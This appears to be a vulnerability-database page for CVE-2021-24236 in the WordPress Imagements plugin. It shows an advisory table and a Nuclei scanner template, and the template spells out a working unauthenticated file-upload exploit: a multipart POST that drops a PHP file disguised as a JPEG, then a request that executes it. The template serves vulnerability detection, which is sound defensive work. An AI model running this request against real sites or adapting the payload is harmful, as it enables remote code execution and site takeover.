| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| The vulnerability of the Imagements image loading plugin in the WordPress content management system allows a hacker to execute arbitrary code. | 26 Oct 202200:00 | – | bdu_fstec | |
| CVE-2021-24236 | 27 Apr 202309:58 | – | circl | |
| WordPress 代码问题漏洞 | 6 May 202100:00 | – | cnnvd | |
| CVE-2021-24236 | 5 May 202118:39 | – | cve | |
| CVE-2021-24236 Imagements <= 1.2.5 - Unauthenticated Arbitrary File Upload to RCE | 5 May 202118:39 | – | cvelist | |
| CVE-2021-24236 | 6 May 202113:15 | – | nvd | |
| WordPress Imagements plugin <= 1.2.5 - Unauthenticated Arbitrary File Upload leading to Remote Code Execution (RCE) vulnerability | 10 Apr 202100:00 | – | patchstack | |
| Cross site request forgery (csrf) | 6 May 202113:15 | – | prion | |
| CVE-2021-24236 | 22 May 202519:21 | – | redhatcve | |
| Imagements <= 1.2.5 - Unauthenticated Arbitrary File Upload to RCE | 8 Apr 202100:00 | – | wpexploit |
id: CVE-2021-24236
info:
name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
author: pussycat0x
severity: critical
description: |
WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
impact: |
This vulnerability can lead to remote code execution and compromise the affected WordPress site.
remediation: |
Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.
reference:
- https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
- https://wordpress.org/plugins/imagements/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
- https://nvd.nist.gov/vuln/detail/CVE-2021-24236
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24236
cwe-id: CWE-434
epss-score: 0.0714
epss-percentile: 0.93501
cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: imagements_project
product: imagements
framework: wordpress
tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project,vuln
variables:
php: "{{to_lower('{{randstr}}')}}.php"
post: "1"
string: "CVE-2021-24236"
http:
- raw:
- |
POST /wp-comments-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="comment"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="author"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="email"
{{randstr}}@email.com
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="url"
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="checkbox"
yes
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="naam"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="image"; filename="{{php}}"
Content-Type: image/jpeg
<?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="submit"
Post Comment
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="comment_post_ID"
{{post}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="comment_parent"
0
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
- |
GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body_2
words:
- '{{md5(string)}}'
# digest: 490a0046304402201ca29d7a5355facb7ee3339c0d86bdfdb8c84d11cc6413a20ed8d6294aa7eda90220484f4911dca0e66949f5439e9c13ff32c3cdb6bd2e3976c6066ddba4e55e5e8f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation